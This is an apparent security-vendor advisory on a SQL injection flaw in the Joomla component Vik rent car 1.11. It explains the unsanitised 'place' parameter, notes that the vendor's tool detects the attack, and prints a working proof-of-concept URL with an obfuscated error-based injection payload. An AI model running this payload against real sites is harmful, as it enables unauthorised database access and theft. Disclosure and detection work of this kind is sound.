Vulnerability in the component Vik rent car 1.11

Platform: Joomla component Vik rent car 1.11

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • SQL injection
  • Local file inclusion
  • Layer 2 intrusion

Source: https://www.exploit-db.com/exploits/41604/

Proof of concept:
http://
targetsite/index.php?option=com_vikrentcar&caropt=[SQL]&days=31&pickup=1490947200&release=1493542800&place=17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31

What can an attacker do with the attack?

Joomla websites with the component Vik rent car 1.11 is vulnerable to the SQL injection attack. This vulnerability exists because the variable place is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters place.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

About Centrora

Centrora 2009-2018, a portfolio of Luxur Group PTY LTD

Level 40, 140 William Street,

Melbourne, VIC,

Australia, 3000

ABN: 67 164 057 461

Accepted Payment

Payment methods VISA
Master
American Express
Paypal
Stripe
© 2009 - 2018 Centrora Security. All Rights Reserved.